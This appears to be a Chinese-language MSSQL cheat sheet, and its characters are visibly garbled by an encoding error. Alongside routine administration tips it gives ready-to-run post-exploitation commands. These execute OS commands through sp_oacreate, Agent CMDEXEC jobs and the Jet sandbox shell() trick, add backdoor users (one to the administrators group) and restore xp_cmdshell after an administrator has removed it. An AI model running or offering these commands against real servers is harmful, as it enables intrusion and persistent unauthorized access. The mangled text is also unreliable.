mssql使用總結(jié)

重設(shè)密碼

exec sp_password null,'新密碼','sa'

執(zhí)行系統(tǒng)命令

(1)exec xp_cmdshell '要執(zhí)行的命令'

(2)declare @shell int
exec sp_oacreate 'wscript.shell',@shell out

exec sp_oamethod @shell ,'run',null,'要執(zhí)行的系統(tǒng)命令'
exec sp_oamethod @shell ,'run',null,'c:\windows\system32\cmd.exe /c net user kkk zzz /add'
exec sp_oamethod @shell ,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators kkk /add'

(3)use msdb;
exec sp_add_job @job_name='ok1';
exec sp_add_jobstep @job_name='ok1',@step_name = 'okok',@subsystem='CMDEXEC',@command='net user ok 123 /add';
exec sp_add_jobserver @job_name = 'ok1',@server_name = 'WWW-84937FCF932';
exec sp_start_job @job_name='ok1'

(4)exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0--開(kāi)啟沙盤(pán)模式

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'--查看沙盤(pán)模式的狀態(tài)
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 321 /add")');--建立一個(gè)用戶名為123的用戶

1.如果沙盒保護(hù)模式未“關(guān)閉”，會(huì)報(bào)錯(cuò)：
服務(wù)器: 消息 7357，級(jí)別 16，狀態(tài) 2，行 1
未能處理對(duì)象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出該對(duì)象中沒(méi)有任何列。
OLE DB 錯(cuò)誤跟蹤[Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

2.如果.mdb不存在或是輸入路徑錯(cuò)誤
服務(wù)器: 消息 7399，級(jí)別 16，狀態(tài) 1，行 1
OLE DB 提供程序 'microsoft.jet.oledb.4.0' 報(bào)錯(cuò)。
[OLE/DB provider returned message: 找不到文件 'C:WINDOWSsystem32iasdnary1.mdb'。]
OLE DB 錯(cuò)誤跟蹤[OLE/DB Provider 'microsoft.jet.oledb.4.0' IDBInitialize::Initialize returned 0x80004005: ]。

3.如果輸入過(guò)程中多了一些空格，也會(huì)報(bào)錯(cuò)。尤其要注意這點(diǎn)，很多人直接網(wǎng)上找文章復(fù)制粘貼進(jìn)去執(zhí)行。
服務(wù)器: 消息 7357，級(jí)別 16，狀態(tài) 2，行 1
未能處理對(duì)象 'select shell("cmd.exe /c net user user passwd /add")'。OLE DB 提供程序 'microsoft.jet.oledb.4.0' 指出該對(duì)象中沒(méi)有任何列。
OLE DB 錯(cuò)誤跟蹤[Non-interface error: OLE DB provider unable to process object, since the object has no columnsProviderName='microsoft.jet.oledb.4.0', Query=select shell("cmd.exe /c net user user passwd /add")']。

4.如果mdb權(quán)限和cmd.exe權(quán)限不對(duì)，同樣會(huì)也出現(xiàn)問(wèn)題。
當(dāng)mdb權(quán)限不對(duì)時(shí)，
服務(wù)器: 消息 7320，級(jí)別 16，狀態(tài) 2，行 1
未能對(duì) OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 執(zhí)行查詢。
[OLE/DB provider returned message: 未知]
OLE DB 錯(cuò)誤跟蹤[OLE/DB Provider 'Microsoft.Jet.OLEDB.4.0' ICommandText::Execute returned 0x80040e14]

查看用戶權(quán)限

sp_helprotect null,'用戶名'

打開(kāi)sql2005的xp_cmdshell

-- 允許配置高級(jí)選項(xiàng)
EXEC sp_configure 'show advanced options', 1
GO
-- 重新配置
RECONFIGURE
GO
-- 啟用xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1

GO
--重新配置
RECONFIGURE
GO

--執(zhí)行想要的xp_cmdshell語(yǔ)句
Exec xp_cmdshell 'query user'
GO

--用完后,要記得將xp_cmdshell禁用(從安全角度安全考慮)

-- 禁用xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0
GO
--重新配置
RECONFIGURE
GO
-- 禁用配置高級(jí)選項(xiàng)
EXEC sp_configure 'show advanced options', 0
GO
-- 重新配置
RECONFIGURE
GO

查看mssql操作日志

SELECT * FROM fn_dblog(null,null)

附加數(shù)據(jù)庫(kù)的命令

oSQL -U sa -P （回車(chē)）
1> sp_attach_db @dbname = N'xxx',
2>@filename1 = N'x:\xxx\xxx\xxx.mdf',
3>@filename2 = N'x:\xxx\xxx\xxx.ldf';
4>go

收縮數(shù)據(jù)庫(kù)

dbcc shrinkdatabase('db_name')

擴(kuò)展數(shù)據(jù)庫(kù)文件

alter database db_customsms add file(NAME=db_customsms_data,FILENAME='D:\MSDE\MSSQL\Data\db_customsms_data3.mdf')

導(dǎo)出表中的數(shù)據(jù)為txt

bcp "Northwind.dbo.Customers" out "d:\customers.txt" -c -Usa -Psa

bcp "select * from Northwind" queryout "d:\customers.txt" -c -Usa -Psa

刪除xp_cmdshell

EXEC sp_dropextendedproc 'xp_cmdshell'

恢復(fù)xp_cmdshell

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

獲取當(dāng)前服務(wù)器系統(tǒng)時(shí)間

select getdate() from 任意一張表的名稱

恢復(fù)xp_cmdshell

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

查看數(shù)據(jù)庫(kù)連接

select @@connections

exec sp_who 'active'

增加mssql緩存

exec sp_configure 'show advanced options',1

reconfigure

exec sp_configure 'max server memory',512

reconfigure

查看當(dāng)前所使用數(shù)據(jù)庫(kù)所在的路徑

select * from sysfiles;

恢復(fù)sp_addextendedproc語(yǔ)句：
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/ (owner.)name of function to call /
@dllname varchar(255)/ name of DLL containing function /
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
恢復(fù)sp_dropextendedproc 語(yǔ)句：
create procedure dbo.sp_dropextendedproc
@functname nvarchar(517) -- name of function
as
-- If we're in a transaction, disallow the dropping of the
-- extended stored procedure.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sys.sp_dropextendedproc')
return (1)
end

-- Drop the extended procedure mapping.
dbcc dropextendedproc( @functname )
return (0) -- sp_dropextendedproc
恢復(fù) sp_OACreate 語(yǔ)句

exec sp_addextendedproc sp_OACreate,'odsole70.dll'

替換記錄中的字符

REPLACE ( original-string, search-string, replace-string )

這個(gè)函數(shù)有一點(diǎn)不足是不支持 text,ntext類型字段的替換，可以通過(guò)下面的語(yǔ)句來(lái)實(shí)現(xiàn)：
update tableName set recordName=replace(cast(recordName as varchar(8000)) ,'abc','ddd')

導(dǎo)出execl表格

exec xp_cmdshell 'bcp "select *或列名1，列名2 from 庫(kù)名.所有者.表名" queryout "c:\文件名.xls" -c -q -S "主機(jī)名" -U "用戶名" -P "密碼"'

裝sql server sp4時(shí),出現(xiàn)以前進(jìn)行的程序安裝創(chuàng)建了掛起的文件操作.運(yùn)行程序之前,必須重新起動(dòng)計(jì)算機(jī)

         在安裝Sql或sp補(bǔ)丁的時(shí)候系統(tǒng)提示之前有掛起的安裝操作，要求重啟，這里往往重啟無(wú)用，解決辦法：到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager　　刪除PendingFileRenameOperations.